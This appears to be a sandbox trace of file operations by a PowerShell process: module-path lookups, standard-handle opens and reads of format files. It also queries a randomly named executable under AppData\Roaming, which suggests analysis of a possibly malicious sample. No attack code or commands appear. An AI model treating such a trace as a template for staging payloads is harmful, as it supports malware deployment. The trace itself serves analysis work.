Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache\BranchCache.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Defender type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Defender\Defender.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Dism type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Dism\Dism.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient\DnsClient.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\International type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\International\International.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI\iSCSI.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\ISE type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\ISE\ISE.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Kds type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Kds\Kds.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psd1 type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psm1 type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.cdxml type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.xaml type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.dll type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psd1 type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psm1 type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.cdxml type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.xaml type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.dll type = file_attributes False 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_attributes True 2
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter\NetAdapter.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetConnection type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetConnection\NetConnection.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetEventPacketCapture type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\NetLbfo\NetLbfo.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\ScheduledTasks type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\SecureBoot type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\SecureBoot\SecureBoot.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\SmbShare type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\SmbShare\SmbShare.psd1 type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 type = file_type True 2
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5 type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psd1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psm1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.cdxml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.xaml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 type = file_attributes True 2
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 type = file_type True 2
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1 type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psd1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psm1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.cdxml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.xaml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 type = file_attributes True 2
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 type = file_type True 2
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psd1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psm1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.cdxml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.xaml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1 type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psd1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psm1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.cdxml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.xaml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 type = file_attributes True 2
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 type = file_type True 2
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1 type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.psd1 type = file_attributes False 1
Get Info C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\ type = file_attributes True 3
Get Info C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex type = file_type True 4
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = file_attributes True 2
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = file_type True 2
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = size, size_out = 0 True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psm1 type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1 type = file_attributes True 1
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadLine.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtilsHelper.ps1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MMAgent\MMAgent.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbWitness\SmbWitness.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\StartLayout\StartLayout.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TLS\TLS.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\VpnClient\VpnClient.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Wdac\Wdac.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psm1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch\WindowsSearch.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1 type = file_attributes True 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 type = file_type True 2
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_attributes True 5
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_type True 2
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_type True 2
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1 type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1 type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_attributes True 5
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_type True 4
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_type True 2
Get Info STD_ERROR_HANDLE type = file_type True 1
Get Info C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe type = file_type True 2
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1 type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1 type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Get Info C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management type = file_attributes False 1
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management type = file_attributes False 1
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Get Info C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe type = file_attributes True 3
Open STD_OUTPUT_HANDLE - True 1
Open STD_INPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 3
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 537 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 33
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3055 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 17, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 950 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 68
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 452 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
